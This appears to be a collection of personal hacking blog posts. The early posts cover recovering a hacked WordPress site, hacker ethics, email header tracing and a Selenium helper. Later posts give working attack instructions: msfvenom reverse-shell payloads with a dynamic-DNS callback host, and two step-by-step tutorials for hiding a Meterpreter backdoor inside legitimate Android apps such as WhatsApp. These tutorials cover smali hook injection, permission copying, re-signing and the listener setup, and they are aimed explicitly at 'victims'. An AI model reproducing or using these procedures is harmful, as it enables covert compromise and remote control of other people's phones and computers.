How I Fixed My Hacked WordPress Blog: Restoring the Content

I made my blog Techkernel quite some time back, but I never took it seriously. I made very few posts, and never bothered to maintain the blog properly. I just moderated the comments, never bothering to reply to them (I know, I’m a terrible person). I also did not update the plugins, nor WordPress itself. But I realised my mistake when my blog got hacked and its most popular post got replaced by some crappy advertisement.


Here I will document what I did to get it back to the way it was before.

Restoring the Original Post

Firstly, I needed to restore the post. WordPress keeps a list of revisions for each post, so I looked there. But, not very surprisingly, the original revision had been removed. The oldest revision I could get was, sadly, the advertisement, not my original post. So this approach was not going to work.


The second step was to look for any backups I had made. I had not set up any solid backup system, so the only backup I could have made was an export file (for your reference, WordPress lets you export all your content as an .xml file). I searched my PC for any file whose name contained techkernel, and voilà, there was one. I was lucky. Had I not made such a backup (which I did for the keks, not anticipating a situation such as this), I would have had to restore it from a backup image of my server at Digital Ocean, which would have been much more painful to do.

So I opened up the export file techkernel.wordpress.2016-04-22.xml, looked for my post in there, and copy-pasted it back to my blog.


Updating the WordPress Site

I use WP-CLI in my WordPress installation, and it’s fantastic. You should also start using it right away if you are not already doing so.

Updating WordPress, its plugins and themes

The first thing I did was update WordPress, all installed plugins and themes to the latest version. I did this using WP-CLI.

Updating WordPress core.

 skulltech@debian-512mb-blr1-01:/var/www/$ wp core update
 Updating to version 4.8 (en_US)...
 Downloading update from
 Unpacking the update...
 Cleaning up files...
 No files found that need cleaned up.
 Success: WordPress updated successfully.

Updating all WordPress plugins.

 skulltech@debian-512mb-blr1-01:/var/www/$ wp plugin update --all
 Enabling Maintenance mode...
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the plugin...
 Plugin updated successfully.
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the plugin...
 Plugin updated successfully.
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the plugin...
 Plugin updated successfully.
 Disabling Maintenance mode...
 | name | old_version | new_version | status |
 | akismet | 3.2 | 3.3.2 | Updated |
 | jetpack | 4.5 | 5.0 | Updated |
 | wordpress-seo | 4.1 | 4.9 | Updated |
 Success: Updated 3 of 3 plugins.

Updating all WordPress themes.

 skulltech@debian-512mb-blr1-01:/var/www/$ wp theme update --all
 Enabling Maintenance mode...
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the theme...
 Theme updated successfully.
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the theme...
 Theme updated successfully.
 Disabling Maintenance mode...
 | name | old_version | new_version | status |
 | twentyfifteen | 1.7 | 1.8 | Updated |
 | twentyseventeen | 1.1 | 1.3 | Updated |
 Success: Updated 2 of 2 themes.

Resetting Passwords

After that, I reset all the passwords: the password of the WordPress installation, the passwords of the user accounts on the DigitalOcean Droplet, and so on.


The Next Steps

The next steps were, obviously, removing any backdoors the hackers may have left and securing the site. I will write a post on that shortly, so stay tuned!

Ethical Hacking and The Hacker Culture

Nowadays most of us have heard the term Ethical Hacker, thanks to ‘hacktivist’ groups like Anonymous gaining popularity in the media. But what exactly is Ethical Hacking? We have a general idea that it means hacking without any malicious intent, or more simply the kind of hacking the ‘good guys’ do. But if we delve deeper, it means more than that: it represents a philosophy and morality popular among the hacker and hacktivist communities.


Formally, Ethical Hacking may be defined as the practice of systematically attempting to break into or penetrate a computer system in order to locate its weaknesses and vulnerabilities, by duplicating the actions of malicious black-hat hackers. Actually, what I just said defines Penetration Testing; to be precise, ‘Ethical Hacking’ is a term coined by IBM, meant to imply a broader category than just penetration testing. Ethical hackers do this ‘penetration testing’ at the request of, or while employed by, the owner of the computer system, so that he can fix these weaknesses and make the system more secure.


Ethical hackers generally follow a set of moral values and a philosophy. They promote the sharing of knowledge; they believe that all information should be free. They also believe that bureaucracies such as corporations are flawed systems, and they promote decentralization because it may lead to freedom of information exchange. They say that hackers shouldn’t be judged by their age, race, or qualifications; they should be judged only by their hacking skill. A common value of community and collaboration is also present among hackers.

I should emphasize that being an ethical hacker doesn’t necessarily mean having these qualities and following these moral values and philosophies. Hacker ethics are separate from simply being a hacker. But these ethics are very popular in the general hacking community, so they may be considered a trait of the community, if not of any individual hacker.

Before concluding, I would like to share a small essay written by a hacker by the name (rather, pseudonym) of ‘The Mentor’ shortly after being arrested. It’s called ‘The Hacker Manifesto’, and it is considered one of the cornerstones of the hacker culture. You can find it here –

Email | Structure and How to Trace it

We have all, at some point in our lives, received fake spam mail telling us that we’ve won a million dollars. Maybe one day you receive a threatening email or a simple phishing mail, and you want to find out who did it so that you can hack him in return. To do that you need to know the IP address of the mail server that sent the email. In this article I’m gonna show you how to do that, after introducing you to the basics of the structure of an Internet Message or, simply, Email.

Email is one of the oldest modes of communication over a computer network (usually the Internet) that is still popular today. The Email we are familiar with was standardized and came into popular usage in the early 1970s, and it has been a core foundation of the Internet since then. Nowadays we all use a fancy web interface or mobile app to send and view emails, so we don’t have to worry about how it works. But that isn’t enough for a hacker, is it? If we don’t know the detailed intricacies of its mechanism, how can we exploit it or do something advanced with it? So, keep reading!

The Internet Message Format

The current Email format is defined in RFC 5322. The format of multimedia Email attachments is defined in RFC 2045 through RFC 2049, and this format is called Multimedia Internet Mail Extensions, or simply MIME. You can read those RFCs to get fully detailed formal documentation of the structure and format of email, but it’s not necessary, as I will discuss it briefly here. Nevertheless, if you are interested in learning more, you can check them out after reading this post of mine.

At the most basic level, an email is a series of ASCII characters. It consists of lines of characters, each line ending with ASCII ‘CRLF’ (carriage return and line feed). The entire email can be divided into two parts, the Header section and the Body. Let’s see an example email to get an idea of what we are talking about.

Received: by with SMTP id e31csp1128773qtc;
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by with SMTP id n82mr2118112ioi.125.1476809419401;
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: from ( [])
by with ESMTPS id g126si21395826ioa.252.2016.
(version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received-SPF: pass ( domain of designates as permitted sender) client-ip=;
spf=pass ( domain of designates as permitted sender)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed;; h=mime-version:from:to:reply-to:subject:content-type:content-transfer-encoding; s=smtpapi; bh=yheKlMFCWTtON78IXgxVWyAUb78=; b=I8q38u7TFdqinW6Y02 AM+ifHWAvTihYfBs5GSZl8JDnuc1BlMffeS8KUkWyRJjLY+B0ch4uPXBvCHdCZ75 VGkMp0jmmQRyVzQ4hfvAeTYVJ0fDzB89cHKyTzLTpd/ak9D0OAcc+6TJFqCgURMH CSrAzDL/ejxBTOEgepL8Y3Feg=
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed;; h=mime-version:from:to:reply-to:subject:content-type:content-transfer-encoding:x-feedback-id; s=smtpapi; bh=yheKlMFCWTtON78IXgxVWyAUb78=; b=YK6zoBmBYxE2GRUFIh Qze6EJGuxLw1UtO+NGfdmUgSmtNVLUt8p/N+CS9nPNONFESaVo2Ebk0iV8OBXqs0 EhPaOVOIiAcnSI/fwzd8A/dN+y3gqNquU3ysc9Gyk3kDcFSI8nj9yC4uhAs4fpMv AC/2kWdHjFjHBiTRYcL07C46M=
Received: by with SMTP id filter0958p1mdw1.2775.580652C7AF
2016-10-18 16:50:15.915852162 +0000 UTC
Received: from ECPRID2AWEB004 ( []) by (SG) with ESMTP id aIawJW2DTFi0CgbichcKJg for ; Tue, 18 Oct 2016 16:50:15.917 +0000 (UTC)
MIME-Version: 1.0
From: Autodesk 
Date: 18 Oct 2016 16:50:15 +0000
Subject: Verify your Autodesk account
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: base64
X-SG-EID: iimKsBOu00eJI3OJPONMulw6aZ/yjiemm1SqdEDLcTZBP1eHyN3Qr32i1Vdhd5J7BwflVrWhRCLr0j woo/OKUHaIA1bGmnv8Qd2DfN0OSocqGDQ8DK7afms0hcjbrNUG/S3Bsv7fJWCR15UEaoJ/qfJtpdgG gZSAdl3d07GxUEWB0KHMNBmsfHLUEhfyzWPfn5IBYcQ334wRxcWBQ/eu31XQd8fIXETIiBgrd19ic6 SiLuZKRyxs7mVzCv46+9G/
X-Feedback-ID: 1621835:SZNY+iwS6efjfOV9JjNuzvzTddPNBc3FolKu4zujGFA=:SZNY+iwS6efjfOV9JjNuzvzTddPNBc3FolKu4zujGFA=:SG


The part before the first empty line is the header of this email, and the rest, after it, is the body. Here you can see that the body part looks like incomprehensible garbage; that’s because it is a MIME message, and the garbage part is actually HTML data encoded with Base64 encoding. You can decode it using any Base64 decoder found online and get the HTML data. Anyway, we are going to focus on the header part, because all the critical information resides there; the body contains just the message.

We can see that the header part consists of header fields, each consisting of a field name and a field value separated by a colon ‘:’. For example, a header field of this email is


Where ‘Delivered-To’ is the field name and ‘’ is the field value. Just to be clear, I replaced my original email ID with ‘’ here.

The header section can contain any number of fields in this format; there is no restriction. So different emails can carry different header fields. But certain fields are mandatory, and those contain the information we need to trace the mail. You can read about the various email header fields here on Wikipedia.

Tracing an Email

Now that we know the basics of the Internet Message Format, it’s time to dive into the fun stuff: tracing the email. For that, we need to concentrate on the Trace fields, so to speak. They contain the information needed to trace it, obviously. The trace fields are:

  • Received
  • Return-Path
  • Authentication-Results
  • Received-SPF
  • Auto-Submitted
  • VBR-Info

Among these, the Received field is the most important and most reliable. When an SMTP server receives a message, it inserts this header at the top of the message. As most emails go through several SMTP servers on their journey from sender to receiver, a message contains several Received fields, each one inserted by a different SMTP server. In the example email the Received fields are:

Received: by with SMTP id e31csp1128773qtc;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by with SMTP id n82mr2118112ioi.125.1476809419401;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: from ( [])
        by with ESMTPS id g126si21395826ioa.252.2016.
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: by with SMTP id filter0958p1mdw1.2775.580652C7AF
        2016-10-18 16:50:15.915852162 +0000 UTC
Received: from ECPRID2AWEB004 ( []) by (SG) with ESMTP id aIawJW2DTFi0CgbichcKJg for ; Tue, 18 Oct 2016 16:50:15.917 +0000 (UTC)

As SMTP servers insert the Received field at the top of the email when they receive it, if we read them from top to bottom we can trace the path the email has travelled. The field value of a Received header field generally contains the host name or IP address of the server itself and the host name or IP of the server from which it received the mail.

Another thing to note here: I’ve also listed the X-Received header field. Any field whose name starts with X- is a non-standard header and cannot be trusted. Such fields are used by mail servers for their own purposes; generally a server won’t trust X- headers inserted by any other server. Anyway, I’ve still included it because it may give us some additional information, keeping in mind that it is not very reliable. So from the Received (and X-Received) fields of the example mail, we can trace the route of the mail, and it would look like this:

  • []

The email went through these servers in this order. So the mail server that actually sent the email is the first one, and if that is the one you were after, you can focus on it.
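Doing the same trace in code, as an added example that is not part of the original post: the Python below parses a constructed header block (placeholder hostnames and RFC 5737 documentation addresses, shaped like the example email above), unfolds the continuation lines, pulls the "from ... [ip]" and "by ..." parts out of each Received field and lists the hops sender-first. It also shows the check a defender wants: only the Received lines written by servers you control can be relied on, so first_trusted_ip reports the client address your own MX actually saw rather than whatever the sending side put below it.

```python
"""Trace the delivery path of an email from its Received headers.

Added example for the "Tracing an Email" section; this is not code from the
original post. The servers in SAMPLE_HEADERS are constructed placeholders
(RFC 5737 documentation addresses), not real hosts.
"""
import re
from dataclasses import dataclass
from email import message_from_string
from typing import List, Optional

# Constructed header block shaped like the example email above: four Received
# lines (newest at the top) plus one X-Received line, which is ignored here
# because, as the text notes, X- headers are not trustworthy.
SAMPLE_HEADERS = """\
Received: by mx.receiver.example with SMTP id e31csp1128773qtc;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by mx.receiver.example with SMTP id n82mr2118112ioi;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: from o1.relay.example (o1.relay.example. [203.0.113.10])
        by mx.receiver.example with ESMTPS id g126si21395826ioa
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: by filter0958.relay.example with SMTP id filter0958p1mdw1.2775
        2016-10-18 16:50:15.915852162 +0000 UTC
Received: from WEBHOST04 (unknown [198.51.100.7]) by ismtpd.relay.example (SG)
        with ESMTP id aIawJW2DTFi0CgbichcKJg; Tue, 18 Oct 2016 16:50:15 +0000 (UTC)
From: Sender <sender@relay.example>
Subject: constructed example

"""

# "from <helo-name> (<reverse-dns> [<ip>])" and "by <host>" clauses of a Received line
FROM_RE = re.compile(r"\bfrom\s+(\S+)(?:\s+\(([^)]*)\))?", re.IGNORECASE)
BY_RE = re.compile(r"\bby\s+(\S+)", re.IGNORECASE)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


@dataclass
class Hop:
    from_host: Optional[str]   # name the sending server announced (HELO/EHLO)
    from_ip: Optional[str]     # address the receiving server actually saw
    by_host: Optional[str]     # server that wrote this Received line
    timestamp: Optional[str]   # date-time after the final ';' (RFC 5322), if present


def parse_received(raw_message: str) -> List[Hop]:
    """Return one Hop per Received header, in header order (top = newest)."""
    msg = message_from_string(raw_message)
    hops: List[Hop] = []
    for value in msg.get_all("Received", []):
        value = " ".join(value.split())  # unfold continuation lines
        from_m = FROM_RE.search(value)
        by_m = BY_RE.search(value)
        from_ip = None
        if from_m and from_m.group(2):
            ip_m = IP_RE.search(from_m.group(2))
            from_ip = ip_m.group(1) if ip_m else None
        # Non-RFC variants (e.g. the UTC line above) carry no ';' and no timestamp.
        timestamp = value.rsplit(";", 1)[1].strip() if ";" in value else None
        hops.append(Hop(
            from_host=from_m.group(1) if from_m else None,
            from_ip=from_ip,
            by_host=by_m.group(1) if by_m else None,
            timestamp=timestamp,
        ))
    return hops


def route(hops: List[Hop]) -> List[str]:
    """Servers the mail passed through, sender first, final receiver last."""
    path: List[str] = []
    for hop in reversed(hops):  # the bottom header was added first
        for host in (hop.from_host, hop.by_host):
            if host and (not path or path[-1] != host):
                path.append(host)
    return path


def first_trusted_ip(hops: List[Hop], trusted_suffix: str) -> Optional[str]:
    """Client IP recorded by the first server we trust (our own MX).

    Everything below that line was supplied by the sending side and may be
    forged, so this is the address to anchor an investigation on.
    """
    for hop in hops:  # top-down: the newest lines belong to the receiver's side
        if hop.by_host and hop.by_host.endswith(trusted_suffix) and hop.from_ip:
            return hop.from_ip
    return None


if __name__ == "__main__":
    hops = parse_received(SAMPLE_HEADERS)
    print(" -> ".join(route(hops)))
    print("client IP seen by our MX:", first_trusted_ip(hops, "receiver.example"))
```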

Automating the Tracing of an Email

Although it’s good, or maybe essential, for a hacker to know how to manually trace an email, you don’t have to do it every time. There are many tools on the Internet that automate this process. You just have to paste the email header into one of those tools and it will trace the route for you. Just search for ‘email header analyser’ on Google and you’ll get a lot of tools like this. There’s one made by Google itself; you can get it here. Happy hacking!


Python – Starting Up Selenium Webdriver, with Custom User-Agent and Profile

I’ve been playing around with Selenium Webdriver in Python, and one of the most annoying things I had to do again and again was looking up how to start a specific Webdriver with a custom user-agent or a custom profile. So I decided to make this module, which takes care of all the little inner workings involved in starting up a Webdriver.

The code is here –

You’ll just have to use the start_webdriver function, and it will do all the magic and return the required Webdriver.

Example usage:

import wdstart
driver = wdstart.start_webdriver(
    driver_name='Chrome',
    user_agent='Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19',
    # raw string: a plain 'C:\Users...' literal is an invalid \U escape in Python 3
    profile_path=r'C:\Users\SkullTech\AppData\Local\Google\Chrome\User Data',
)

In most cases you won’t have to worry about what’s happening under the hood (the details are not at all important and can be found with a simple Google search), but if you want, you can read the code thoroughly and use parts of it in your own code.

Please leave a comment if this helped you or you’ve faced any problem. Thanks.

Use DDNS to Deal with Your Dynamic Public IP

Many of us have an internet connection with a dynamic public IP. That poses some problems if you want to use that connection to host a website, or maybe, for hackers like us, to hack using reverse connection payloads. In this post I’m going to discuss how you can overcome that using Dynamic DNS, or DDNS. But I’m getting ahead of myself, so let me start by explaining what a public IP is and what problems you can encounter if you have a dynamic one.

Understanding Dynamic Public IP Address

The public IP is the IP that’s visible to machines outside your local network. For example, if two or more machines are connected to the internet through a router (maybe over WiFi), then the machines form a local network, and both of them are also connected to the Internet. Each of them has a private IP address that is unique only locally, not globally. To connect to the Internet, they use the router’s public IP.

IP addresses can be static or dynamic. Most ISPs provide a dynamic public IP, which means it changes from time to time, in contrast to a static one, which remains fixed. You can check what your public IP is by googling ‘What is my IP’; Google will tell you.

Having a dynamic IP address is a hindrance to hacking using reverse connection payloads. Reverse connection payloads, such as android/meterpreter/reverse_tcp, store the host IP address, i.e. the IP address of the attacker machine. When the payload gets executed, it connects back to the host machine using that host IP. But as a dynamic IP keeps changing from time to time, you won’t be able to use a payload for long, because after some time the IP stored inside it won’t point to your machine anymore. That’s a problem. A major one. This is where DDNS comes in.

Dynamic DNS aka DDNS to the Rescue

We all know what DNS, or the Domain Naming System, is: it’s the system which binds an IP to a domain name. When you try to connect to a domain name, for example by opening in a browser, the request first goes to a DNS server, which resolves the domain name into an IP, and then the browser gets the Google homepage from that IP. Similarly, you can get a domain name for your machine and put that domain name in place of the HOST IP address in your payload. But the problem of your IP being dynamic still remains.

Here DDNS comes to the rescue. DDNS servers update the DNS record of your machine continuously, so that even for dynamic IP machines the domain name resolves to the correct IP, always.

Setting up DDNS using No-IP

There are many DDNS providers; I’m going to use No-IP, which is one of them.

Step 1: Creating a No-IP account

Head to and create a free account there.

Step 2: Adding a Hostname in No-IP

When you get to the dashboard, go to Dynamic DNS -> Hostnames and add a hostname of your choice there. You can also choose a domain name from a list. The address you will get is hostname.domainname. For example, I chose the default domain name and the hostname I entered is skulltech, so the address I got is ‘’. Refer to the screenshots below for reference.


Step 3: Install the Dynamic DNS Update Client

Now you’ll need to install a program on your computer and set it up so that it connects to the No-IP server frequently and updates the DNS record. Download the update client from . It’s a tar.gz archive; extract it using the following command:

tar -xzvf noip-duc-linux.tar.gz

Screenshot from 2016-12-18 14:24:36

After that, change the working directory to the newly extracted folder and run the following command to install the No-IP client:

make install

After that the program will ask for your No-IP username and password.

Step 4: Configure the Client and Run It

Run the following command to launch the configuration wizard of the No-IP client. It will ask you for your credentials, as well as which hostnames you want to update. Select the hostname (or hostnames) that you want to associate with this computer in that step.

noip2 -C

When you are done with the configuration, just run noip2 in the terminal to start the client; it will run in the background and keep updating your DNS record.



Using DDNS hostname in Payloads

You can create a basic reverse shell payload for Windows and get a shell on a remote computer by running it on that computer. Refer to this tutorial by Offensive Security for that; I won’t be going into the details of how to do it. Assuming that you already know how to create these payloads using msfvenom (if you don’t, check out this tutorial), I’ll show you how you can use your DDNS hostname there.

Generally we run a command like this to generate the payload. Here LHOST is the address of our local machine; in the following example it’s 

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Now that we have a DDNS hostname, pass that as LHOST to msfvenom instead of your IP. So now the command will be:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Feel free to leave a comment if you face any problem. Happy Hacking! 🙂

Embed a Metasploit Payload in an original .apk File | Part 2 – Do it manually

Metasploit’s flagship product, the Meterpreter, is a very powerful, all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending commands to it. For example, we could grab sensitive data out of the compromised system.

The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones too. But if you have tried out these payloads, you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app on their phone?

One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original one, so the victim won’t even know that his system is compromised. That’s what we are going to do in this tutorial.

NOTE – This is a follow-up to my previous post, in which I showed you how to do this using a very simple yet effective Ruby script. If you haven’t read it, check it out. If you are not willing to go down the hard path, you can use that method to do it just fine. But if you want to know the inner workings and gain a deeper understanding, continue reading this post. Also, in the following Android hacking tutorials I may refer to this one, so if you can take it, I suggest you keep on reading.


This tutorial is based on the Kali Linux operating system. I’m sure it can be done on other OSes, especially Linux distros, but that would involve some more complications, so I’m not going to cover them. If you are serious about Hacking [or Penetration Testing, if you prefer], you should use Kali, as it was built specifically for Pen-Testing.

We will also need some libraries and tools in the following steps, so I think it’s better if you install them right now.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

Also download the apk which you want to be backdoored from any source you like. Just do a Google search for “app_name apk download” and Google will come up with a lot of results. Save that apk in the root folder.


Since this tutorial is a little bit long, I’m giving a brief overview of what we are going to do here.

  1. Generate the Meterpreter payload
  2. Decompile the payload and the original apk
  3. Copy the payload files to the original apk
  4. Inject the hook into the appropriate activity of the original apk
  5. Inject the permissions in the AndroidManifest.xml file
  6. Re-compile the original apk
  7. Sign the apk using Jarsigner

That’s about it. I will also show you how you can get a working Meterpreter session using that backdoored apk, if you don’t know that already. So let’s get started.


First of all, we have to make the Meterpreter payload. We are going to use MSFVenom for this. The command is:

msfvenom -p android/meterpreter/[Payload_Type] LHOST=[IP_Address] LPORT=[Incoming_Port] -o meterpreter.apk
      • Replace [Payload_Type] with any of the following available payloads. The function of all these payloads is the same; essentially they are all Meterpreter payloads, and the difference is only in the method they use to connect to your Kali system. The available [Payload_Type]s are –
        1. reverse_tcp
        2. reverse_http
        3. reverse_https

        You can use any one you like, I’m going to use reverse_https as an example.

      • Replace [IP_Address] with the IP address to which the payload is going to connect back, i.e. the IP address of the attacker’s system. If you are going to perform this attack over a local network (e.g. if the victim and attacker are connected to the same WiFi hotspot), your local IP will suffice. To find out what your local IP is, run the command –
        Screenshot from 2015-12-18 13:56:49

        If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google “My IP” and Google will help you out.

      • Replace [Incoming_Port] with the port no. which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I’m going to use 4895 as an example.

So run the command after replacing the keywords with appropriate values, and MSFVenom will generate a payload “meterpreter.apk” in the root directory. Note that we specified the output file name using the “-o meterpreter.apk” argument in the command, so if you like, you can name it anything else.

Screenshot from 2015-12-18 14:23:14


Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –

apktool d -f -o payload /root/meterpreter.apk

apktool d -f -o original /root/[Original_APK_Name]

It will decompile the payload to the “/root/payload” directory and the original apk to the “/root/original” directory.

Screenshot from 2015-12-19 01:30:26



Now we have to copy the payload files to the original app’s folder. Just go to “/root/payload/smali/com/metasploit/stage” and copy all the .smali files whose file name contains the word ‘payload’. Now paste them in “/root/original/smali/com/metasploit/stage”. Note that this folder does not exist, so you have to create it.


In the previous step, we just copied the payload code into the original apk, so that when the original apk is recompiled, it will contain the payload. But that doesn’t necessarily mean that the payload will run. To ensure that the payload runs, we have to inject a hook into the original apk’s .smali code. If you are wondering what this hook thingy I’m talking about is, well, essentially it’s code which intercepts some specific function call and reacts to it. In this case, we are going to place the hook so that when the app is launched, it will also launch the payload with it.

For this, we first have to find out which activity [to put it simply, activities are sections of code, similar to frames in Windows programming] is run when the app is launched. We can get this info from the AndroidManifest.xml file.

So open up the AndroidManifest.xml file located inside the “/root/original” folder using any text editor. If you know HTML, then this file will look familiar to you. Both of them are essentially markup languages, and both use the familiar tags-and-attributes structure [e.g. <tag attribute="value"> Content </tag>]. Anyway, look for an <activity> tag which contains both of these lines –

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its “android:name” attribute’s value. In my case, as you can see from the screenshot below, it is “com.piriform.ccleaner.ui.activity.MainActivity”.

Screenshot from 2015-12-19 13:21:32

Those two lines we searched for signify that this is the activity which is going to start when we launch the app from the launcher icon, and also that this is a MAIN activity [similar to the ‘main’ function in traditional programming].

Now that we have the name of the activity we want to inject the hook into, let’s get to it! First of all, open the .smali code of that activity using gedit. Just open a terminal and type –

gedit /root/original/smali/[Activity_Path]

Replace [Activity_Path] with the activity’s “android:name”, but type slashes instead of the dots. Actually, the smali code is stored in folders that mirror the “android:name” package path, so we can easily get the location of the .smali file in this way. Check the screenshot below and you will get an idea of what I’m trying to say.

Screenshot from 2015-12-19 19:06:17

Now search for the following line in the smali code [using CTRL+F] –


When you locate it, paste the following code in the line next to it –

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

What we are doing here is inserting code which starts the payload alongside the existing code that is executed when the activity starts. Now, save the edited smali file.


From –

Additional finer-grained security features are provided through a “permission” mechanism that enforces restrictions on the specific operations that a particular process can perform.

If we do not declare all the additional permissions that our payload is going to need, it cannot function properly. While installing an app, these permissions are shown to the user. But most users don’t care to read all that boring text, so we do not have to worry about that much.

These permissions are also listed in the AndroidManifest file we encountered earlier. So let’s open the AndroidManifest.xml of both the original app and the payload from their respective folders. The permissions are declared inside <uses-permission> tags as the ‘android:name’ attribute. Copy the additional permission lines from the payload’s AndroidManifest to the original app’s one. But be careful that there are no duplicates.

Here’s my original app’s AndroidManifest before editing –

Screenshot from 2015-12-19 19:37:12

After adding the additional ones from the payload’s AndroidManifest, my /root/original/AndroidManifest.xml looks like this –

Screenshot from 2015-12-19 19:42:48


Now the hard parts are all done! We just have to recompile the backdoored app into an installable apk. Run the following command –

apktool b /root/original

Screenshot from 2015-12-19 20:14:31

You will now have the compiled apk inside the “/root/original/dist” directory. But, we’re still not done yet.


This is also a very important step, as in most of the cases, an unsigned apk cannot be installed. From –

Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate's private key.

In this case we are going to sign the apk using the default android debug key. Just run the following command –

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA [apk_path] androiddebugkey

Be sure to replace the [apk_path] in the above command with the path to your backdoored apk file.

Screenshot from 2015-12-19 20:28:31


Now if you can get the victim to install and run this very legit-looking app on his phone, you can get a working Meterpreter session on his phone!


Embed a Metasploit Payload in an Original .apk File | Part 1 – The Easy Way

Hi Fellas! I’m sure most of you, or at least those who have set foot in the kingdom of hacking, have heard of Metasploit. Don’t be disappointed if you haven’t, because you’re on the right track.

From Wikipedia,

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

In more informal language, it’s a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is the ‘Meterpreter’, which also has an Android version that comes as an .apk file. In case you are wondering what a payload is, it’s a program we can install on a victim’s system to compromise it. Normally we have to install the Meterpreter payload on the victim’s phone by any means [usually involving social engineering], and when the victim runs the application, we get a direct connection to that phone remotely and can use it to wreak havoc on it.

But since the payload app doesn’t look very legit, takes up only a few kB, and doesn’t show anything when tapped, the victim will probably uninstall it right away, or worse, won’t install it at all. So we have to solve that problem.

Here’s where this tutorial comes in. I’m gonna show you how to take any .apk file, be it WhatsApp or Amazon or SnapChat, and embed the Meterpreter payload in that apk. To the victim it will look and behave exactly like the original app, so he will use it regularly without any doubt, letting you do anything you want to his phone.


Just to be clear, in this tutorial the operating system used is Kali Linux, which is the de facto standard OS for penetration testing (read: hacking). You should also install the latest version of ‘ApkTool’ and some libraries for the scripts to work properly.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.


First of all, grab the original apk from any of the numerous websites available. Just do a Google search for “app_name apk download” and Google will come up with a lot of results. Save that apk in any folder; in this tutorial I will use the root folder and WhatsApp.apk as the example.


Download the Ruby script from this link and save it in the same folder as that of the original apk.


Open a terminal, and type the following command:

ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST= LPORT=4895

In this example I’ve used as the local IP address, i.e. your IP address, and 4895 as the port on your computer through which the Meterpreter payload will connect back to you. Make sure to change these to the appropriate values, especially the IP; the LPORT can be set to any reasonable port number.

NOTE – If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the LHOST option. You may also need to forward the port you’re using for this attack to work properly.

Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more often than not it cannot determine which Activity of the app it should bind the payload to, so it asks you to select it. In that case, leave the terminal open with the script at the prompt, and browse to /root/original.

Then open the AndroidManifest.xml file using any text editor you like and look for an <activity> tag which contains both the strings ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for its ‘android:name’ attribute and note the name of that Activity.

At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.

This is the hardest step of all, so I’m posting some screenshots to make your life easier.



If you did everything correctly, you should now get an apk file in your root directory with the name ‘backdoored_WhatsApp.apk’. It will install and run just like the original app.

As for the listener, you should use multi/handler and set the corresponding options accordingly. Just run the following commands.

use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LPORT 4895

Now wait for the victim to run the app; when he does, you will get a Meterpreter prompt in the terminal!



